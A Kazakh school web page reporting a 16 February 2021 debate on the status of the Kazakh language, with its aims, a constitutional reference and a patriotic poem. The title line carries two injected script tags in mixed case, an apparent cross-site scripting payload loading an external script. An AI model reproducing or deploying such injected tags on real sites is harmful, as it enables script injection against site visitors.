Пікір- сайыс алаңы. Тақырыбы"Қазақ тілінің қазіргі қоғамдағы мәртебесі"<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
16.02.2021
Тақырыбы: «Қазіргі қоғамдағы қазақ тілінің мәртебесі»
Мақсаты:
1) жастардың сөздік қорын молайту, ана тіліміздің қадір – қасиетін
бойына дарыту, ана тілімізді қадірлей білуге үйрету;
2) көпшілік алдында еркін сөйлеуге үйрету, тіл байлығын,
шешендік өнерге баулу;
3) еліміздің әлеуметтік, саяси істеріне өз үлестерін қосып, ой-толғаныстарымен бөлісуге үйрету.
Тіл – халықтың жаны. Тілі құрыған халық та жер бетінен жоғалады. Ана тіліміздің тағдыры үшін бабаларымыз қам - қарекетсіз болған емес. Жиырмасыншы жылдары тіл тәуелсіздігін ту етіп көтерген Әлихан, Ахмет, Міржақып, Мағжан, Мұхтарлар, сексенінші жылдардың аяғында бостандықтың лебі ескен бүкілхалықтық қозғалыс - соның айқын айғағы. 1995 жылдың 30 тамызында қабылданған еліміздің Конституциясының 7- бабында «Қазақстан Республикасындағы мемлекеттік тіл – қазақ тілі» деп белгіленді.
Елдік, ерлік, бірлік, қайрат, бақ, ардың
Жауыз тағдыр жойды бәрін не бардың.
Алтын күннен бағасыз бір белгі боп,
Нұрлы жұлдыз - бабам тілі, сен қалдың! – деп Мағжан атамыз жырлаған тіліміздің қазіргі таңдағы жағдайы, қолдану аясы қандай деген мақсатпен «Қазіргі қоғамдағы қазақ тілінің мәртебесі» атты тақырыпта пікір – сайыс өткізілді.
Просмотров: 902